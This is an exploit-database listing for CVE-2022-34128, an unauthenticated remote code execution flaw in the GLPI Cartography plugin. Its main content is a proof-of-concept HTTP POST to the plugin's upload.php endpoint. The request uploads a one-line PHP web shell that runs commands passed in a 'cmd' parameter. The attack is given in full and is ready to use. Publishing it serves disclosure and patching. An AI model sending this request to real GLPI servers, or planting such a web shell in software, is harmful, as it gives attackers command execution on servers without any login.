Lucene search

K
packetstormNuri CilengirPACKETSTORM:171660
HistoryApr 03, 2023 - 12:00 a.m.

GLPI Cartography Shell Upload

2023-04-0300:00:00
Nuri Cilengir
packetstormsecurity.com
180
remote code execution
unauthenticated
vulnerability
glpi cartography
rce
exploit
security

EPSS

0.024

Percentile

89.9%

`# Exploit Title: GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)  
# Date of found: 11 Jun 2022  
# Application: GLPI Cartography < 6.0.0  
# Author: Nuri Γ‡ilengir   
# Vendor Homepage: https://glpi-project.org/  
# Software Link: https://github.com/InfotelGLPI/positions  
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/  
# Tested on: Ubuntu 22.04  
# CVE: CVE-2022-34128  
  
# PoC  
POST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1  
Host: 192.168.56.113  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Length: 39  
Origin: http://192.168.56.113  
Connection: close  
  
<?php echo system($_GET["cmd"]); ?>  
  
`

EPSS

0.024

Percentile

89.9%

Related for PACKETSTORM:171660